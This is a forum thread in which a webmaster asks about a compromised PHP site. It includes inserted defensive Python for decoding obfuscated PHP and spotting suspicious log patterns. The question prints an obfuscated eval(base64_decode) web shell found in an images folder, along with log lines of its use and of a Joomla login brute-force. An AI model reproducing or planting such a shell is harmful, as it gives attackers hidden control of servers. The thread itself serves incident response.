What kind of a hack is this?

Posted on 2014-12-23
Medium Priority
Last Modified: 2014-12-23
I had a bunch of PHP files messed up yesterday by some script.  The common thing is they had 666 permissions rather than 644.  But ... still ... a script had access to mess the files up.

This morning I find these lines in one of the logs:

    - - [23/Dec/2014:00:05:06 -0500] "POST /images/gwwgv.php HTTP/1.1" 200 33 "-" "Opera/9.80 (Windows NT 6.1; Opera Tablet/15165; U; en) Presto/2.8.149 Version/11.1"
    - - [23/Dec/2014:04:03:17 -0500] "POST /images/gwwgv.php HTTP/1.1" 200 33 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; ja-JP) AppleWebKit/533.20.25 (KHTML, like Gecko) Version/5.0.4 Safari/533.20.27"

And the PHP file in question is this:

<?php /*m\i2s-*/eval/*Ad?K8s*/(/*jHF&*/base64_decode/*(~G+z*/(/*=32*/'Lyp6OTNaYn0qL2V2YWwvKjNZezMqLygvKjcuSz1pWyovYmFzZTY0X2RlY29kZS8qRHFHeyovKC8qLno2K'/*ueL<*/./*6 qH*/'WVFWiovJ0x5cE1VM3RUSmlvdmFXWXZLa0EyZlc5UWZpb3ZLQzhxWicvKlE/c3IwaiovLi8qOnxASCovJ1'/*HnRA*/./*Cdlj=.*/'ZGK0tpOXBjM05sZEM4cU0yWWhZaTVZWkNvdktDOHFYMScvKl9pfTVSR3oqLy4vKmpxdH02Ki8nMUtLaTh'/*!.R5*/./*ehZS%*/'rWDFKRlVWVkZVMVF2S2w4bUxEOUpVeW92V3k4Jy8qIW9KdUQqLy4vKm97NEcqLydxSVRFd1VWOHdXU292'/*PKlM}%*/./*n{*/'SjNrbkx5b3RleWhxY3k1QUtpOHUnLypLVy58Wi0qLy4vKkk5WnFdW0gqLydMeW9zS0d3cEtpOG5aeWN2S'/*<o!}3*/./*}en~p*/'240OFZtc3FMeTR2S24xdFAnLyorWDB7ciovLi8qVVJMdSovJ2xoTE15b3ZKM2tuTHlwN1MxeDdkeW92TG'/*E;4=]*/./*(9S*/'k4cUlHMXBVbCcvKmR4a25EayovLi8qN3VCKi8nb3FMeWQ0Snk4cVRqazVLaTh1THlwcWJERitVellxTHl'/*{HYT2t*/./*;0UAF9*/'kJy8qVF9ePDMqLy4vKkF3RGIqLydrSnk4cVRIQmhOU292WFM4cU9YazFTRlVxTHk4cWFqNWwnLyowMjd0'/*_R|W*/./*f-KQq_*/'Ki8uLypJY099IFRyKi8nVlY0cUx5a3ZLbTQwTFc0cUx5OHFOVlZOYm1SYUtpOHBMJy8qR25IeCovLi8qO'/*hc]4b*/./*K^oB5y*/'nlvbEAqLyd5cFZlazl2YlhFcUwyVjJZV3d2S2poK0prMGhTeW92S0MnLyogaChbc3pUNSovLi8qeWllcW'/*X(4J:@*/./*5,>*/'tyUCovJzhxUURaZVF5b3ZjM1J5YVhCemJHRnphR1Z6THlweElGQScvKjNmVWhUKi8uLypeMngzKi8nc0x'/*s:@*/./*gf=*/'pb3ZLQzhxT0U1ek1WZ3lZQ292SkY5U1JWRlZSVk5VJy8qLEJxPTVwaSovLi8qTilTMCUqLydMeW9oVVZo'/*b>x]*/./*>|TG*/'b1Fsd3FMMXN2S2lWN1p6Z3pLaThuZVNjdksnLypgRzhOZlcqLy4vKiVZNSovJ2tjaFhqQXFMeTR2S2xGd'/*t|qE5*/./*(}XycS*/'FlrOHNLaThuWnljdktrZzZiUycvKkt4WkElSEgqLy4vKjB+VS0qLydvdkxpOHFRSEZZYkRVcUx5ZDVlR1'/*[:I*/./*:bP*/'FuTHlvaGZTaFNLaTknLyp9KF9yUiovLi8qTW5VZGsuXSovJ2RMeXBYT25wRFlGa3FMeThxTWljc1czNXZ'/*wEy93*/./*?0{^*/'LaThwTHlvZycvKlVSXWJ0Ki8uLypJaS4qLydYVUk0VWlvdkx5bzVLWGw0Y0NvdktTOHFVbXRpVnp0OUsn'/*u}C*/./*5_D0*/'LypJUWZ4Ki8uLyp7LHsxeTgqLydpOHZLa1ZmYlc4NVFrQlVLaTg3THlwWWFubGVjU2h3YVNvdicvKkEnJ'/*!ja*/./*~J_n*/'05SXHhqKi8pLyopK215PSovLypzMC1nWztJKi8pLypZXHQ1ZlEqLy8qcEVRZ0xbXyovOy8qfEo0LT8qLw=='/*uRn34*/)/*kzY!*//*JJD*/)/*:@uW*//*BN9T*/;/*ZTX%*/ ?>


What kind of attack is this? I want to correct more completely than just locking down the permissions so that the script doesn't work.

Of course, I'll delete the PHP file, but ... there's a vulnerability involved that allowed the file to be placed there.  I want to close that down.

Question by: Daniel Wilson
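The file quoted in the question is an `eval(base64_decode(...))` wrapper with `/* ... */` comments wedged between every token and the base64 literal split up with `.` concatenation, so a plain search for the usual `eval(base64_decode(` signature misses it; the posted literal itself decodes to yet another wrapper of the same shape. The following is an added example (not from the thread or any of its participants) of how a defender can triage such a file statically: strip the comment noise, rejoin the split literal, decode each layer without ever executing it, and check for the 0666 permission the question mentions. Function names such as `peel` and `scan_file` are this example's own, and `SAMPLE` is a constructed two-layer input in the same style, not the posted payload.

```python
import base64
import os
import re
import stat

# PHP /* ... */ block comments, which the posted shell sprinkles between tokens.
BLOCK_COMMENT = re.compile(r"/\*.*?\*/", re.DOTALL)
# Rejoin single-quoted literals split with '.' concatenation: 'abc' . 'def' -> 'abcdef'
CONCAT = re.compile(r"'\s*\.\s*'")
# The decode-and-execute construct with one base64 literal inside it.
EVAL_DECODE = re.compile(
    r"eval\s*\(\s*base64_decode\s*\(\s*'([A-Za-z0-9+/=]+)'\s*\)\s*\)"
)


def normalise(src: str) -> str:
    """Remove comment noise and rejoin split string literals so patterns line up."""
    return CONCAT.sub("", BLOCK_COMMENT.sub("", src))


def peel(src: str, max_depth: int = 10):
    """Statically unwrap nested eval(base64_decode('...')) layers; nothing is executed.

    Returns (layers, innermost): each normalised wrapper that was found, and the
    normalised text left after the last successful decode.
    """
    layers = []
    current = src
    for _ in range(max_depth):
        norm = normalise(current)
        match = EVAL_DECODE.search(norm)
        if match is None:
            return layers, norm
        layers.append(norm)
        current = base64.b64decode(match.group(1)).decode("utf-8", errors="replace")
    return layers, normalise(current)


def is_world_writable(mode: int) -> bool:
    """True for modes such as 0o666 that let any local account rewrite the file."""
    return bool(mode & stat.S_IWOTH)


def scan_file(path: str) -> dict:
    """Combine the two indicators from the question for one file on disk."""
    with open(path, "r", encoding="utf-8", errors="replace") as fh:
        layers, innermost = peel(fh.read())
    return {
        "path": path,
        "eval_decode_layers": len(layers),
        "world_writable": is_world_writable(os.stat(path).st_mode),
        "innermost": innermost,
    }


def obfuscate(payload: str) -> str:
    """Build a constructed sample in the style of the posted file (test input only)."""
    b64 = base64.b64encode(payload.encode()).decode()
    half = len(b64) // 2
    return ("<?php /*m\\i2s*/eval/*Ad?K*/(/*jH*/base64_decode/*G+z*/(/*=32*/'"
            + b64[:half] + "'/*ueL*/./*6 qH*/'" + b64[half:]
            + "'/*uRn*/)/*kz*/)/*JJD*/;/*ZT*/ ?>")


# Constructed two-layer sample; the innermost code is a harmless echo.
SAMPLE = obfuscate(obfuscate("echo 'inner marker';"))

if __name__ == "__main__":
    found, inner = peel(SAMPLE)
    print(f"{len(found)} eval(base64_decode) layer(s); innermost code: {inner}")
    print("0666 world-writable:", is_world_writable(0o666))
```

Run `scan_file()` over every `.php` under the web root and review anything with a non-zero layer count or a world-writable mode; decoding with `b64decode` rather than PHP's `eval` means the triage never runs attacker code. The innermost text tells you what the dropped file actually did, which in turn points at what else to look for in the logs.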
LVL 58

Expert Comment

ID: 40514876
What are you running?
WordPress or similar?
The contact form is the usual way to hack if it was done through the website, or one of the plugins/vulnerabilities of WP et al.
Otherwise you need to check the server logs for SSH/FTP brute-force attacks.
LVL 32

Author Comment

by: Daniel Wilson
ID: 40514886
There is one Joomla site ... though most are hand-coded PHP.

Thanks for the tip ... I'll look harder at some of those other logs.
LVL 58

Accepted Solution

Gary earned 2000 total points
ID: 40514888
Joomla would be the one I would be looking at with stern eyes.
LVL 32

Author Comment

by: Daniel Wilson
ID: 40514900
Looks like it's been quite a target.  I have hundreds of lines like this from one IP in the same day.

    - - [03/Nov/2014:23:20:35 -0500] "POST /administrator/index.php HTTP/1.1" 200 4335 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)"
    - - [03/Nov/2014:23:20:35 -0500] "GET /administrator/index.php HTTP/1.1" 200 4113 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)"
    - - [03/Nov/2014:23:20:36 -0500] "POST /administrator/index.php HTTP/1.1" 200 4335 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)"
    - - [03/Nov/2014:23:20:36 -0500] "GET /administrator/index.php HTTP/1.1" 200 4113 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)"

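The two log patterns the thread turns up are worth detecting automatically: the question's POSTs to a `.php` file under `/images/` (a directory that should only ever serve static content) and this comment's burst of POSTs to `/administrator/index.php` from a single address. The following is an added example, not from the thread or any of its participants, that parses combined-format access log lines and flags both. The lines quoted in the thread have the client address stripped (they start with `- -`), so the sample input below is constructed, using placeholder addresses from the RFC 5737 documentation ranges; `parse_log`, `php_in_static_dirs` and `login_bursts` are this example's own names, and the `/uploads/` and `/media/` prefixes are assumed extras beyond the `/images/` seen on the page.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Apache/nginx "combined" log format; %z parses the -0500 offset.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+)[^"]*" (?P<status>\d{3}) \S+ '
    r'"[^"]*" "(?P<ua>[^"]*)"'
)
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"


def parse_log(text: str) -> list:
    """Parse combined-format lines into dicts; lines that do not match are skipped."""
    entries = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        e = m.groupdict()
        e["ts"] = datetime.strptime(e["ts"], TS_FMT)
        e["path"] = e["path"].split("?", 1)[0]   # drop the query string
        e["status"] = int(e["status"])
        entries.append(e)
    return entries


def php_in_static_dirs(entries, prefixes=("/images/", "/uploads/", "/media/")):
    """PHP executing from a directory meant for static files: a dropped file."""
    return sorted({(e["ip"], e["path"]) for e in entries
                   if e["path"].endswith(".php") and e["path"].startswith(prefixes)})


def login_bursts(entries, path="/administrator/index.php", threshold=5,
                 window=timedelta(seconds=60)) -> dict:
    """Source addresses that POST to the login path `threshold` or more times in any `window`."""
    by_ip = defaultdict(list)
    for e in entries:
        if e["method"] == "POST" and e["path"] == path:
            by_ip[e["ip"]].append(e["ts"])
    flagged = {}
    for ip, times in by_ip.items():
        times.sort()
        start, peak = 0, 0
        for end, t in enumerate(times):
            while t - times[start] > window:     # slide the window forward
                start += 1
            peak = max(peak, end - start + 1)
        if peak >= threshold:
            flagged[ip] = peak
    return flagged


# --- constructed sample input (addresses are documentation-range placeholders) ---
def _line(ip, ts, method, path, status, size, ua):
    return f'{ip} - - [{ts}] "{method} {path} HTTP/1.1" {status} {size} "-" "{ua}"'


UA_OLD = "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)"
SAMPLE_LOG = "\n".join(
    [_line("203.0.113.9", "23/Dec/2014:00:05:06 -0500", "POST", "/images/gwwgv.php", 200, 33,
           "Opera/9.80 (Windows NT 6.1; Opera Tablet/15165; U; en) Presto/2.8.149 Version/11.1"),
     _line("203.0.113.9", "23/Dec/2014:04:03:17 -0500", "POST", "/images/gwwgv.php", 200, 33,
           "Mozilla/5.0 (Windows; U; Windows NT 6.0; ja-JP) AppleWebKit/533.20.25 (KHTML, like Gecko) Version/5.0.4 Safari/533.20.27"),
     _line("192.0.2.1", "23/Dec/2014:09:12:00 -0500", "GET", "/images/logo.png", 200, 5120, "Mozilla/5.0"),
     _line("192.0.2.1", "23/Dec/2014:09:12:01 -0500", "GET", "/index.php?view=home", 200, 8192, "Mozilla/5.0"),
     # one ordinary administrator login from a different address
     _line("198.51.100.7", "03/Nov/2014:08:00:00 -0500", "POST", "/administrator/index.php", 303, 0, "Mozilla/5.0")]
    # the burst: six POST/GET pairs in six seconds from one address
    + [_line("203.0.113.5", f"03/Nov/2014:23:20:{35 + i} -0500", m, "/administrator/index.php", 200, s, UA_OLD)
       for i in range(6) for m, s in (("POST", 4335), ("GET", 4113))]
)

if __name__ == "__main__":
    log = parse_log(SAMPLE_LOG)
    print("PHP under static dirs:", php_in_static_dirs(log))
    print("login bursts:", login_bursts(log))
```

The static-directory check is the cheaper of the two: any hit means a file was written where the application never writes, so the upload path or the account that did it is the thing to fix, not just the file. The burst threshold and window are tuning knobs; a real administrator rarely submits the login form five times in a minute, while the thread reports hundreds of attempts from one address in a day.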

LVL 35

Expert Comment

ID: 40514976
If you have root access (e.g. dedicated server, VPS, etc), then try using OSSEC to help secure your site against random attacks like this.

Here's a good tutorial on how to set it up:

The tutorial is geared towards WordPress but OSSEC is a general-purpose security application:
